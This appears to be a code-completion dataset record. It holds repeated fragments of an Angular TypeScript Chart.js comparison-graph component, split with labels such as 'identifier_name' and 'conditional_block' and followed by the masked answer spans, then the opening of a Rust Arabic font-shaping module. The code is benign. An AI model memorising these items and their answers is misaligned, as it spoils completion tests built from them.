if (tooltip.opacity === 0) {
tooltipEl.style.opacity = '0';
return;
}
const yourDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 0);
const communityDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 1);
let yourLabel: string = null;
let yourDelta: string = null;
let communityLabel: string = null;
let communityDelta: string = null;
for (const bBody of tooltip.beforeBody) {
const [id, label, delta] = bBody.split('|||');
if (id === 'your') {
yourLabel = label;
yourDelta = delta;
} else {
communityLabel = label;
communityDelta = delta;
}
}
// console.debug(
// 'labels',
// yourLabel,
// communityLabel,
// tooltip.beforeBody,
// yourDatapoint,
// communityDatapoint,
// );
const playerSection = yourDatapoint?.formattedValue
? this.buildSection(
'player',
yourLabel,
this.turnLabel,
this.statLabel,
this.deltaLabel,
yourDelta != null ? parseInt(yourDelta) : null,
yourDatapoint,
)
: '';
const communitySection = communityDatapoint?.formattedValue
? this.buildSection(
'average',
communityLabel,
this.turnLabel,
this.statLabel,
this.deltaLabel,
communityDelta != null ? parseInt(communityDelta) : null,
communityDatapoint,
)
: '';
const innerHtml = `
<div class="body">
${playerSection}
${communitySection}
</div>
`;
const tableRoot = tooltipEl.querySelector('.content');
tableRoot.innerHTML = innerHtml;
const tooltipWidth = tooltipEl.getBoundingClientRect().width;
const tooltipHeight = tooltipEl.getBoundingClientRect().height;
const leftOffset = yourDatapoint?.parsed != null ? 0 : 50;
const tooltipLeft = Math.max(
0,
Math.min(
tooltip.caretX - tooltipWidth / 2 + leftOffset,
chartParent.getBoundingClientRect().right - tooltipWidth,
),
);
// caret should always be positioned on the initial tooltip.caretX. However, since the
// position is relative to the tooltip element, we need to do some gymnastic :)
// 10 is because of padding
const tooltipArrowEl: any = tooltipEl.querySelector('.tooltip-arrow');
const carretLeft = tooltip.caretX - tooltipLeft - 8;
tooltipArrowEl.style.left = carretLeft + 'px';
// Display, position, and set styles for font
// Make sure the bottom doesn't go outside of the graph
let tooltipTop = tooltip.y - tooltipHeight;
const chartHeight = tooltip.chart.canvas.offsetHeight;
if (tooltipTop + tooltipHeight > chartHeight) {
tooltipTop = chartHeight - tooltipHeight - 25;
}
if (tooltipTop < 0) {
tooltipTop = 0;
}
tooltipEl.style.opacity = '1';
tooltipEl.style.left = tooltipLeft + 'px';
tooltipEl.style.top = tooltipTop + 'px';
// Set caret Position
tooltipEl.classList.remove('above', 'below', 'no-transform');
tooltipEl.classList.add('top');
},
},
},
scales: {
xAxes: {
display: showYAxis,
grid: {
color: '#841063',
},
ticks: {
color: '#D9C3AB',
font: {
family: 'Open Sans',
style: 'normal',
},
},
},
yAxes: {
display: showYAxis,
position: 'left',
grid: {
color: '#40032E',
},
ticks: {
color: '#D9C3AB',
font: {
family: 'Open Sans',
style: 'normal',
},
stepSize: stepSize,
callback: (value, index, ticks) => {
if (showYAxis || isNaN(parseInt('' + value))) {
return value;
}
return +value % stepSize === 0 ? value : null;
},
},
beginAtZero: true,
max: maxYValue,
},
},
};
return result;
}
private buildSection(
theClass: 'player' | 'average',
label: string,
turnLabel: string,
statLabel: string,
deltaLabel: string,
delta: number,
datapoint: TooltipItem<'line'>,
): string {
return `
<div class="section ${theClass}">
<div class="subtitle">${label}</div>
<div class="value">${turnLabel} ${datapoint?.label}</div>
<div class="value">${
datapoint?.formattedValue
? statLabel + ' ' + parseInt(datapoint.formattedValue).toFixed(0)
: 'No data'
}</div>
<div class="delta">${
this.showDeltaWithPrevious && delta != null
? deltaLabel.replace('{{delta}}', '' + delta.toFixed(0))
: ''
}</div>
</div>
`;
}
}
| yourValues | identifier_name |
graph-with-comparison-new.component.ts | import {
AfterContentInit,
ChangeDetectionStrategy,
ChangeDetectorRef,
Component,
ElementRef,
Input,
ViewChild,
} from '@angular/core';
import { AbstractSubscriptionStoreComponent } from '@components/abstract-subscription-store.component';
import { AppUiStoreFacadeService } from '@legacy-import/src/lib/js/services/ui-store/app-ui-store-facade.service';
import { ChartData, ChartOptions, TooltipItem } from 'chart.js';
import { BehaviorSubject, combineLatest, filter, Observable, share, takeUntil } from 'rxjs';
import { NumericTurnInfo } from '../../models/battlegrounds/post-match/numeric-turn-info';
@Component({
selector: 'graph-with-comparison-new',
styleUrls: [`../../../css/component/battlegrounds/graph-with-comparison.component.scss`],
template: `
<ng-container
*ngIf="{ lineChartData: lineChartData$ | async, lineChartOptions: lineChartOptions$ | async } as value"
>
<div class="legend">
<div class="item average" [helpTooltip]="communityTooltip">
<div class="node"></div>
{{ communityLabel$ | async }}
</div>
<div
class="item current"
[helpTooltip]="yourTooltip"
*ngIf="value.lineChartData?.datasets[1]?.data?.length"
>
<div class="node"></div>
{{ yourLabel$ | async }}
</div>
</div>
<div class="container-1">
<div style="display: block; position: relative; height: 100%; width: 100%;">
<canvas
*ngIf="value.lineChartData?.datasets[0]?.data?.length"
#chart
baseChart
[data]="value.lineChartData"
[options]="value.lineChartOptions"
[legend]="false"
[type]="'line'"
></canvas>
</div>
</div>
</ng-container>
`,
changeDetection: ChangeDetectionStrategy.OnPush,
})
export class GraphWithComparisonNewComponent extends AbstractSubscriptionStoreComponent implements AfterContentInit {
@ViewChild('chart', { static: false }) chart: ElementRef;
lineChartData$: Observable<ChartData<'line'>>;
lineChartOptions$: Observable<ChartOptions>;
communityLabel$: Observable<string>;
yourLabel$: Observable<string>;
@Input() communityTooltip: string;
@Input() yourTooltip: string;
@Input() turnLabel = 'Turn';
@Input() statLabel = 'Stat';
@Input() deltaLabel: string;
@Input() id: string;
@Input() showDeltaWithPrevious: boolean;
@Input() set maxYValue(value: number) {
this.maxYValue$$.next(value);
}
@Input() set stepSize(value: number) {
this.stepSize$$.next(value);
}
@Input() set showYAxis(value: boolean) {
this.showYAxis$$.next(value);
}
@Input() set communityLabel(value: string) {
this.communityLabel$$.next(value);
}
@Input() set yourLabel(value: string) {
this.yourLabel$$.next(value);
}
@Input() set communityValues(value: readonly NumericTurnInfo[]) {
this.communityValues$$.next(value);
}
@Input() set yourValues(value: readonly NumericTurnInfo[]) {
this.yourValues$$.next(value);
}
private maxYValue$$ = new BehaviorSubject<number>(null);
private stepSize$$ = new BehaviorSubject<number>(null);
private showYAxis$$ = new BehaviorSubject<boolean>(true);
private communityLabel$$ = new BehaviorSubject<string>('Community');
private yourLabel$$ = new BehaviorSubject<string>('You');
private communityValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
private yourValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
constructor(
protected readonly store: AppUiStoreFacadeService,
protected readonly cdr: ChangeDetectorRef,
private readonly el: ElementRef,
) {
super(store, cdr);
}
ngAfterContentInit(): void {
this.communityLabel$ = this.communityLabel$$.pipe(this.mapData((info) => info));
this.yourLabel$ = this.yourLabel$$.pipe(this.mapData((info) => info));
this.lineChartData$ = combineLatest([
this.communityLabel$$.asObservable(),
this.yourLabel$$.asObservable(),
this.communityValues$$.asObservable(),
this.yourValues$$.asObservable(),
]).pipe(
this.mapData(([communityLabel, yourLabel, communityValues, yourValues]) => {
// Turn 0 is before any battle, so it's not really interesting for us
const community = this.removeTurnZero(communityValues || []);
const your = this.removeTurnZero(yourValues || []);
const maxTurnFromCommunity = this.getMaxTurn(community);
const maxTurnFromYour = this.getMaxTurn(your);
const lastTurn = Math.max(maxTurnFromCommunity, maxTurnFromYour);
const filledCommunity = this.fillMissingData(community, lastTurn);
const filledYour = this.fillMissingData(your, lastTurn);
// console.debug('chart data', filledCommunity, filledYour, lastTurn, community, your);
const yourData = filledYour?.map((stat) => stat.value) || [];
const communityData = filledCommunity?.map((stat) => stat.value) || [];
// TODO: missing color
const newChartData: ChartData<'line'>['datasets'] = [
{
id: 'your',
data: yourData,
label: yourLabel,
backgroundColor: 'transparent',
borderColor: '#FFB948',
delta: yourData?.length
? [
yourData[0],
...yourData.slice(1).map((n, i) => (yourData[i] == null ? null : n - yourData[i])),
]
: [],
} as any,
{
id: 'community',
data: communityData,
label: communityLabel,
backgroundColor: 'transparent',
borderColor: '#CE73B4',
delta: communityData?.length
? [
communityData[0],
...communityData
.slice(1)
.map((n, i) => (communityData[i] == null ? null : n - communityData[i])),
]
: [],
} as any,
];
const result = {
datasets: newChartData,
labels: [...Array(lastTurn + 1).keys()].filter((turn) => turn > 0).map((turn) => '' + turn),
};
return result;
}),
share(),
takeUntil(this.destroyed$),
);
const maxValue$ = combineLatest([this.maxYValue$$.asObservable(), this.lineChartData$]).pipe(
filter(([maxValue, chartData]) => !!chartData),
this.mapData(([maxYValue, chartData]) => {
const maxValue = Math.max(
...chartData.datasets.map((data) => data.data as number[]).reduce((a, b) => a.concat(b), []),
);
return !!maxYValue ? Math.max(maxYValue, maxValue) : undefined;
}),
);
this.lineChartOptions$ = combineLatest([
maxValue$,
this.stepSize$$.asObservable(),
this.showYAxis$$.asObservable(),
]).pipe(
this.mapData(([maxValue, stepSize, showYAxis]) => this.buildChartOptions(showYAxis, stepSize, maxValue)),
);
}
private removeTurnZero(input: readonly NumericTurnInfo[]): readonly NumericTurnInfo[] {
return input.filter((stat) => stat.turn > 0);
}
private fillMissingData(input: readonly NumericTurnInfo[], lastTurn: number) {
const result = [];
for (let i = 1; i <= lastTurn; i++) {
result.push(
input.find((stat) => stat.turn === i) || {
turn: i,
value: null,
},
);
}
return result;
}
private getMaxTurn(input: readonly NumericTurnInfo[]) {
return input.filter((stat) => stat.value != null).length === 0
? 0
: Math.max(...input.filter((stat) => stat.value != null).map((stat) => stat.turn));
}
private buildChartOptions(showYAxis: boolean, stepSize: number, maxYValue: number): ChartOptions {
const result: ChartOptions = {
responsive: true,
maintainAspectRatio: false,
layout: {
padding: 0,
},
elements: {
point: {
radius: 0,
},
},
plugins: {
datalabels: {
display: false,
},
tooltip: {
enabled: false,
mode: 'index',
intersect: false,
position: 'nearest',
backgroundColor: '#CE73B4',
titleColor: '#40032E',
titleFont: {
family: 'Open Sans',
},
bodyColor: '#40032E',
bodyFont: {
family: 'Open Sans',
},
padding: 5,
caretPadding: 2,
caretSize: 10,
cornerRadius: 0,
displayColors: false,
callbacks: {
beforeBody: (items: TooltipItem<'line'>[]): string | string[] => {
return items?.map(
(item: any) =>
((item?.dataset as any)?.id ?? '') +
'|||' +
(item?.dataset?.label ?? '') +
'|||' +
item?.dataset?.delta[item.dataIndex],
);
},
},
external: (context) => {
const tooltipId = 'chartjs-tooltip-stats-' + this.id;
const chartParent = this.chart.nativeElement.parentNode;
let tooltipEl = document.getElementById(tooltipId);
if (!tooltipEl) {
tooltipEl = document.createElement('div');
tooltipEl.id = tooltipId;
tooltipEl.classList.add('tooltip-container');
tooltipEl.innerHTML = `
<div class="stats-tooltip">
<svg class="tooltip-arrow" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 9">
<polygon points="0,0 8,-9 16,0"/>
</svg>
<div class="content"></div>
</div>`;
chartParent.appendChild(tooltipEl);
}
// Hide if no tooltip
const tooltip = context.tooltip;
if (tooltip.opacity === 0) {
tooltipEl.style.opacity = '0';
return;
}
const yourDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 0);
const communityDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 1);
let yourLabel: string = null;
let yourDelta: string = null;
let communityLabel: string = null;
let communityDelta: string = null;
for (const bBody of tooltip.beforeBody) {
const [id, label, delta] = bBody.split('|||');
if (id === 'your') {
yourLabel = label;
yourDelta = delta;
} else {
communityLabel = label;
communityDelta = delta;
}
}
// console.debug(
// 'labels',
// yourLabel,
// communityLabel,
// tooltip.beforeBody,
// yourDatapoint,
// communityDatapoint,
// );
const playerSection = yourDatapoint?.formattedValue
? this.buildSection(
'player',
yourLabel,
this.turnLabel,
this.statLabel,
this.deltaLabel,
yourDelta != null ? parseInt(yourDelta) : null,
yourDatapoint,
)
: '';
const communitySection = communityDatapoint?.formattedValue
? this.buildSection(
'average',
communityLabel,
this.turnLabel,
this.statLabel,
this.deltaLabel,
communityDelta != null ? parseInt(communityDelta) : null,
communityDatapoint,
)
: '';
const innerHtml = `
<div class="body">
${playerSection}
${communitySection}
</div> |
const tooltipWidth = tooltipEl.getBoundingClientRect().width;
const tooltipHeight = tooltipEl.getBoundingClientRect().height;
const leftOffset = yourDatapoint?.parsed != null ? 0 : 50;
const tooltipLeft = Math.max(
0,
Math.min(
tooltip.caretX - tooltipWidth / 2 + leftOffset,
chartParent.getBoundingClientRect().right - tooltipWidth,
),
);
// caret should always be positioned on the initial tooltip.caretX. However, since the
// position is relative to the tooltip element, we need to do some gymnastic :)
// 10 is because of padding
const tooltipArrowEl: any = tooltipEl.querySelector('.tooltip-arrow');
const carretLeft = tooltip.caretX - tooltipLeft - 8;
tooltipArrowEl.style.left = carretLeft + 'px';
// Display, position, and set styles for font
// Make sure the bottom doesn't go outside of the graph
let tooltipTop = tooltip.y - tooltipHeight;
const chartHeight = tooltip.chart.canvas.offsetHeight;
if (tooltipTop + tooltipHeight > chartHeight) {
tooltipTop = chartHeight - tooltipHeight - 25;
}
if (tooltipTop < 0) {
tooltipTop = 0;
}
tooltipEl.style.opacity = '1';
tooltipEl.style.left = tooltipLeft + 'px';
tooltipEl.style.top = tooltipTop + 'px';
// Set caret Position
tooltipEl.classList.remove('above', 'below', 'no-transform');
tooltipEl.classList.add('top');
},
},
},
scales: {
xAxes: {
display: showYAxis,
grid: {
color: '#841063',
},
ticks: {
color: '#D9C3AB',
font: {
family: 'Open Sans',
style: 'normal',
},
},
},
yAxes: {
display: showYAxis,
position: 'left',
grid: {
color: '#40032E',
},
ticks: {
color: '#D9C3AB',
font: {
family: 'Open Sans',
style: 'normal',
},
stepSize: stepSize,
callback: (value, index, ticks) => {
if (showYAxis || isNaN(parseInt('' + value))) {
return value;
}
return +value % stepSize === 0 ? value : null;
},
},
beginAtZero: true,
max: maxYValue,
},
},
};
return result;
}
private buildSection(
theClass: 'player' | 'average',
label: string,
turnLabel: string,
statLabel: string,
deltaLabel: string,
delta: number,
datapoint: TooltipItem<'line'>,
): string {
return `
<div class="section ${theClass}">
<div class="subtitle">${label}</div>
<div class="value">${turnLabel} ${datapoint?.label}</div>
<div class="value">${
datapoint?.formattedValue
? statLabel + ' ' + parseInt(datapoint.formattedValue).toFixed(0)
: 'No data'
}</div>
<div class="delta">${
this.showDeltaWithPrevious && delta != null
? deltaLabel.replace('{{delta}}', '' + delta.toFixed(0))
: ''
}</div>
</div>
`;
}
} | `;
const tableRoot = tooltipEl.querySelector('.content');
tableRoot.innerHTML = innerHtml; | random_line_split |
graph-with-comparison-new.component.ts | import {
AfterContentInit,
ChangeDetectionStrategy,
ChangeDetectorRef,
Component,
ElementRef,
Input,
ViewChild,
} from '@angular/core';
import { AbstractSubscriptionStoreComponent } from '@components/abstract-subscription-store.component';
import { AppUiStoreFacadeService } from '@legacy-import/src/lib/js/services/ui-store/app-ui-store-facade.service';
import { ChartData, ChartOptions, TooltipItem } from 'chart.js';
import { BehaviorSubject, combineLatest, filter, Observable, share, takeUntil } from 'rxjs';
import { NumericTurnInfo } from '../../models/battlegrounds/post-match/numeric-turn-info';
@Component({
selector: 'graph-with-comparison-new',
styleUrls: [`../../../css/component/battlegrounds/graph-with-comparison.component.scss`],
template: `
<ng-container
*ngIf="{ lineChartData: lineChartData$ | async, lineChartOptions: lineChartOptions$ | async } as value"
>
<div class="legend">
<div class="item average" [helpTooltip]="communityTooltip">
<div class="node"></div>
{{ communityLabel$ | async }}
</div>
<div
class="item current"
[helpTooltip]="yourTooltip"
*ngIf="value.lineChartData?.datasets[1]?.data?.length"
>
<div class="node"></div>
{{ yourLabel$ | async }}
</div>
</div>
<div class="container-1">
<div style="display: block; position: relative; height: 100%; width: 100%;">
<canvas
*ngIf="value.lineChartData?.datasets[0]?.data?.length"
#chart
baseChart
[data]="value.lineChartData"
[options]="value.lineChartOptions"
[legend]="false"
[type]="'line'"
></canvas>
</div>
</div>
</ng-container>
`,
changeDetection: ChangeDetectionStrategy.OnPush,
})
export class GraphWithComparisonNewComponent extends AbstractSubscriptionStoreComponent implements AfterContentInit {
@ViewChild('chart', { static: false }) chart: ElementRef;
lineChartData$: Observable<ChartData<'line'>>;
lineChartOptions$: Observable<ChartOptions>;
communityLabel$: Observable<string>;
yourLabel$: Observable<string>;
@Input() communityTooltip: string;
@Input() yourTooltip: string;
@Input() turnLabel = 'Turn';
@Input() statLabel = 'Stat';
@Input() deltaLabel: string;
@Input() id: string;
@Input() showDeltaWithPrevious: boolean;
@Input() set maxYValue(value: number) {
this.maxYValue$$.next(value);
}
@Input() set stepSize(value: number) {
this.stepSize$$.next(value);
}
@Input() set showYAxis(value: boolean) {
this.showYAxis$$.next(value);
}
@Input() set communityLabel(value: string) {
this.communityLabel$$.next(value);
}
@Input() set yourLabel(value: string) {
this.yourLabel$$.next(value);
}
@Input() set communityValues(value: readonly NumericTurnInfo[]) {
this.communityValues$$.next(value);
}
@Input() set yourValues(value: readonly NumericTurnInfo[]) {
this.yourValues$$.next(value);
}
private maxYValue$$ = new BehaviorSubject<number>(null);
private stepSize$$ = new BehaviorSubject<number>(null);
private showYAxis$$ = new BehaviorSubject<boolean>(true);
private communityLabel$$ = new BehaviorSubject<string>('Community');
private yourLabel$$ = new BehaviorSubject<string>('You');
private communityValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
private yourValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
constructor(
protected readonly store: AppUiStoreFacadeService,
protected readonly cdr: ChangeDetectorRef,
private readonly el: ElementRef,
) {
super(store, cdr);
}
ngAfterContentInit(): void {
this.communityLabel$ = this.communityLabel$$.pipe(this.mapData((info) => info));
this.yourLabel$ = this.yourLabel$$.pipe(this.mapData((info) => info));
this.lineChartData$ = combineLatest([
this.communityLabel$$.asObservable(),
this.yourLabel$$.asObservable(),
this.communityValues$$.asObservable(),
this.yourValues$$.asObservable(),
]).pipe(
this.mapData(([communityLabel, yourLabel, communityValues, yourValues]) => {
// Turn 0 is before any battle, so it's not really interesting for us
const community = this.removeTurnZero(communityValues || []);
const your = this.removeTurnZero(yourValues || []);
const maxTurnFromCommunity = this.getMaxTurn(community);
const maxTurnFromYour = this.getMaxTurn(your);
const lastTurn = Math.max(maxTurnFromCommunity, maxTurnFromYour);
const filledCommunity = this.fillMissingData(community, lastTurn);
const filledYour = this.fillMissingData(your, lastTurn);
// console.debug('chart data', filledCommunity, filledYour, lastTurn, community, your);
const yourData = filledYour?.map((stat) => stat.value) || [];
const communityData = filledCommunity?.map((stat) => stat.value) || [];
// TODO: missing color
const newChartData: ChartData<'line'>['datasets'] = [
{
id: 'your',
data: yourData,
label: yourLabel,
backgroundColor: 'transparent',
borderColor: '#FFB948',
delta: yourData?.length
? [
yourData[0],
...yourData.slice(1).map((n, i) => (yourData[i] == null ? null : n - yourData[i])),
]
: [],
} as any,
{
id: 'community',
data: communityData,
label: communityLabel,
backgroundColor: 'transparent',
borderColor: '#CE73B4',
delta: communityData?.length
? [
communityData[0],
...communityData
.slice(1)
.map((n, i) => (communityData[i] == null ? null : n - communityData[i])),
]
: [],
} as any,
];
const result = {
datasets: newChartData,
labels: [...Array(lastTurn + 1).keys()].filter((turn) => turn > 0).map((turn) => '' + turn),
};
return result;
}),
share(),
takeUntil(this.destroyed$),
);
const maxValue$ = combineLatest([this.maxYValue$$.asObservable(), this.lineChartData$]).pipe(
filter(([maxValue, chartData]) => !!chartData),
this.mapData(([maxYValue, chartData]) => {
const maxValue = Math.max(
...chartData.datasets.map((data) => data.data as number[]).reduce((a, b) => a.concat(b), []),
);
return !!maxYValue ? Math.max(maxYValue, maxValue) : undefined;
}),
);
this.lineChartOptions$ = combineLatest([
maxValue$,
this.stepSize$$.asObservable(),
this.showYAxis$$.asObservable(),
]).pipe(
this.mapData(([maxValue, stepSize, showYAxis]) => this.buildChartOptions(showYAxis, stepSize, maxValue)),
);
}
private removeTurnZero(input: readonly NumericTurnInfo[]): readonly NumericTurnInfo[] {
return input.filter((stat) => stat.turn > 0);
}
private fillMissingData(input: readonly NumericTurnInfo[], lastTurn: number) {
const result = [];
for (let i = 1; i <= lastTurn; i++) {
result.push(
input.find((stat) => stat.turn === i) || {
turn: i,
value: null,
},
);
}
return result;
}
private getMaxTurn(input: readonly NumericTurnInfo[]) {
return input.filter((stat) => stat.value != null).length === 0
? 0
: Math.max(...input.filter((stat) => stat.value != null).map((stat) => stat.turn));
}
private buildChartOptions(showYAxis: boolean, stepSize: number, maxYValue: number): ChartOptions {
const result: ChartOptions = {
responsive: true,
maintainAspectRatio: false,
layout: {
padding: 0,
},
elements: {
point: {
radius: 0,
},
},
plugins: {
datalabels: {
display: false,
},
tooltip: {
enabled: false,
mode: 'index',
intersect: false,
position: 'nearest',
backgroundColor: '#CE73B4',
titleColor: '#40032E',
titleFont: {
family: 'Open Sans',
},
bodyColor: '#40032E',
bodyFont: {
family: 'Open Sans',
},
padding: 5,
caretPadding: 2,
caretSize: 10,
cornerRadius: 0,
displayColors: false,
callbacks: {
beforeBody: (items: TooltipItem<'line'>[]): string | string[] => {
return items?.map(
(item: any) =>
((item?.dataset as any)?.id ?? '') +
'|||' +
(item?.dataset?.label ?? '') +
'|||' +
item?.dataset?.delta[item.dataIndex],
);
},
},
external: (context) => {
const tooltipId = 'chartjs-tooltip-stats-' + this.id;
const chartParent = this.chart.nativeElement.parentNode;
let tooltipEl = document.getElementById(tooltipId);
if (!tooltipEl) {
tooltipEl = document.createElement('div');
tooltipEl.id = tooltipId;
tooltipEl.classList.add('tooltip-container');
tooltipEl.innerHTML = `
<div class="stats-tooltip">
<svg class="tooltip-arrow" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 9">
<polygon points="0,0 8,-9 16,0"/>
</svg>
<div class="content"></div>
</div>`;
chartParent.appendChild(tooltipEl);
}
// Hide if no tooltip
const tooltip = context.tooltip;
if (tooltip.opacity === 0) |
const yourDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 0);
const communityDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 1);
let yourLabel: string = null;
let yourDelta: string = null;
let communityLabel: string = null;
let communityDelta: string = null;
for (const bBody of tooltip.beforeBody) {
const [id, label, delta] = bBody.split('|||');
if (id === 'your') {
yourLabel = label;
yourDelta = delta;
} else {
communityLabel = label;
communityDelta = delta;
}
}
// console.debug(
// 'labels',
// yourLabel,
// communityLabel,
// tooltip.beforeBody,
// yourDatapoint,
// communityDatapoint,
// );
const playerSection = yourDatapoint?.formattedValue
? this.buildSection(
'player',
yourLabel,
this.turnLabel,
this.statLabel,
this.deltaLabel,
yourDelta != null ? parseInt(yourDelta) : null,
yourDatapoint,
)
: '';
const communitySection = communityDatapoint?.formattedValue
? this.buildSection(
'average',
communityLabel,
this.turnLabel,
this.statLabel,
this.deltaLabel,
communityDelta != null ? parseInt(communityDelta) : null,
communityDatapoint,
)
: '';
const innerHtml = `
<div class="body">
${playerSection}
${communitySection}
</div>
`;
const tableRoot = tooltipEl.querySelector('.content');
tableRoot.innerHTML = innerHtml;
const tooltipWidth = tooltipEl.getBoundingClientRect().width;
const tooltipHeight = tooltipEl.getBoundingClientRect().height;
const leftOffset = yourDatapoint?.parsed != null ? 0 : 50;
const tooltipLeft = Math.max(
0,
Math.min(
tooltip.caretX - tooltipWidth / 2 + leftOffset,
chartParent.getBoundingClientRect().right - tooltipWidth,
),
);
// caret should always be positioned on the initial tooltip.caretX. However, since the
// position is relative to the tooltip element, we need to do some gymnastic :)
// 10 is because of padding
const tooltipArrowEl: any = tooltipEl.querySelector('.tooltip-arrow');
const carretLeft = tooltip.caretX - tooltipLeft - 8;
tooltipArrowEl.style.left = carretLeft + 'px';
// Display, position, and set styles for font
// Make sure the bottom doesn't go outside of the graph
let tooltipTop = tooltip.y - tooltipHeight;
const chartHeight = tooltip.chart.canvas.offsetHeight;
if (tooltipTop + tooltipHeight > chartHeight) {
tooltipTop = chartHeight - tooltipHeight - 25;
}
if (tooltipTop < 0) {
tooltipTop = 0;
}
tooltipEl.style.opacity = '1';
tooltipEl.style.left = tooltipLeft + 'px';
tooltipEl.style.top = tooltipTop + 'px';
// Set caret Position
tooltipEl.classList.remove('above', 'below', 'no-transform');
tooltipEl.classList.add('top');
},
},
},
scales: {
xAxes: {
display: showYAxis,
grid: {
color: '#841063',
},
ticks: {
color: '#D9C3AB',
font: {
family: 'Open Sans',
style: 'normal',
},
},
},
yAxes: {
display: showYAxis,
position: 'left',
grid: {
color: '#40032E',
},
ticks: {
color: '#D9C3AB',
font: {
family: 'Open Sans',
style: 'normal',
},
stepSize: stepSize,
callback: (value, index, ticks) => {
if (showYAxis || isNaN(parseInt('' + value))) {
return value;
}
return +value % stepSize === 0 ? value : null;
},
},
beginAtZero: true,
max: maxYValue,
},
},
};
return result;
}
private buildSection(
theClass: 'player' | 'average',
label: string,
turnLabel: string,
statLabel: string,
deltaLabel: string,
delta: number,
datapoint: TooltipItem<'line'>,
): string {
return `
<div class="section ${theClass}">
<div class="subtitle">${label}</div>
<div class="value">${turnLabel} ${datapoint?.label}</div>
<div class="value">${
datapoint?.formattedValue
? statLabel + ' ' + parseInt(datapoint.formattedValue).toFixed(0)
: 'No data'
}</div>
<div class="delta">${
this.showDeltaWithPrevious && delta != null
? deltaLabel.replace('{{delta}}', '' + delta.toFixed(0))
: ''
}</div>
</div>
`;
}
}
| {
tooltipEl.style.opacity = '0';
return;
} | conditional_block |
arabic.rs | //! Implementation of font shaping for Arabic scripts
//!
//! Code herein follows the specification at:
//! <https://github.com/n8willis/opentype-shaping-documents/blob/master/opentype-shaping-arabic-general.md>
use crate::error::{ParseError, ShapingError};
use crate::gsub::{self, FeatureMask, GlyphData, GlyphOrigin, RawGlyph};
use crate::layout::{GDEFTable, LayoutCache, LayoutTable, GSUB};
use crate::tag;
use crate::unicode::mcc::{
modified_combining_class, sort_by_modified_combining_class, ModifiedCombiningClass,
};
use std::convert::From;
use unicode_joining_type::{get_joining_type, JoiningType};
#[derive(Clone)]
struct ArabicData {
joining_type: JoiningType,
feature_tag: u32,
}
impl GlyphData for ArabicData {
fn merge(data1: ArabicData, _data2: ArabicData) -> ArabicData {
// TODO hold off for future Unicode normalisation changes
data1
}
}
// Arabic glyphs are represented as `RawGlyph` structs with `ArabicData` for its `extra_data`.
type ArabicGlyph = RawGlyph<ArabicData>;
impl ArabicGlyph {
fn is_transparent(&self) -> bool {
self.extra_data.joining_type == JoiningType::Transparent || self.multi_subst_dup
}
fn is_left_joining(&self) -> bool {
self.extra_data.joining_type == JoiningType::LeftJoining
|| self.extra_data.joining_type == JoiningType::DualJoining
|| self.extra_data.joining_type == JoiningType::JoinCausing
}
fn is_right_joining(&self) -> bool {
self.extra_data.joining_type == JoiningType::RightJoining
|| self.extra_data.joining_type == JoiningType::DualJoining
|| self.extra_data.joining_type == JoiningType::JoinCausing
}
fn feature_tag(&self) -> u32 {
self.extra_data.feature_tag
}
fn set_feature_tag(&mut self, feature_tag: u32) {
self.extra_data.feature_tag = feature_tag
}
}
impl From<&RawGlyph<()>> for ArabicGlyph {
fn from(raw_glyph: &RawGlyph<()>) -> ArabicGlyph {
// Since there's no `Char` to work out the `ArabicGlyph`s joining type when the glyph's
// `glyph_origin` is `GlyphOrigin::Direct`, we fallback to `JoiningType::NonJoining` as
// the safest approach
let joining_type = match raw_glyph.glyph_origin {
GlyphOrigin::Char(c) => get_joining_type(c),
GlyphOrigin::Direct => JoiningType::NonJoining,
};
ArabicGlyph {
unicodes: raw_glyph.unicodes.clone(),
glyph_index: raw_glyph.glyph_index,
liga_component_pos: raw_glyph.liga_component_pos,
glyph_origin: raw_glyph.glyph_origin,
small_caps: raw_glyph.small_caps,
multi_subst_dup: raw_glyph.multi_subst_dup,
is_vert_alt: raw_glyph.is_vert_alt,
fake_bold: raw_glyph.fake_bold,
fake_italic: raw_glyph.fake_italic,
variation: raw_glyph.variation,
extra_data: ArabicData {
joining_type,
// For convenience, we loosely follow the spec (`2. Computing letter joining
// states`) here by initialising all `ArabicGlyph`s to `tag::ISOL`
feature_tag: tag::ISOL,
},
}
}
}
impl From<&ArabicGlyph> for RawGlyph<()> {
fn from(arabic_glyph: &ArabicGlyph) -> RawGlyph<()> {
RawGlyph {
unicodes: arabic_glyph.unicodes.clone(),
glyph_index: arabic_glyph.glyph_index,
liga_component_pos: arabic_glyph.liga_component_pos,
glyph_origin: arabic_glyph.glyph_origin,
small_caps: arabic_glyph.small_caps,
multi_subst_dup: arabic_glyph.multi_subst_dup,
is_vert_alt: arabic_glyph.is_vert_alt,
fake_bold: arabic_glyph.fake_bold,
variation: arabic_glyph.variation,
fake_italic: arabic_glyph.fake_italic,
extra_data: (),
}
}
}
pub fn gsub_apply_arabic(
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
raw_glyphs: &mut Vec<RawGlyph<()>>,
) -> Result<(), ShapingError> {
match gsub_table.find_script(script_tag)? {
Some(s) => {
if s.find_langsys_or_default(lang_tag)?.is_none() {
return Ok(());
}
}
None => return Ok(()),
}
let arabic_glyphs = &mut raw_glyphs.iter().map(ArabicGlyph::from).collect();
// 1. Compound character composition and decomposition
apply_lookups(
FeatureMask::CCMP,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
// 2. Computing letter joining states
{
let mut previous_i = arabic_glyphs
.iter()
.position(|g| !g.is_transparent())
.unwrap_or(0);
for i in (previous_i + 1)..arabic_glyphs.len() {
if arabic_glyphs[i].is_transparent() {
continue;
}
if arabic_glyphs[previous_i].is_left_joining() && arabic_glyphs[i].is_right_joining() {
arabic_glyphs[i].set_feature_tag(tag::FINA);
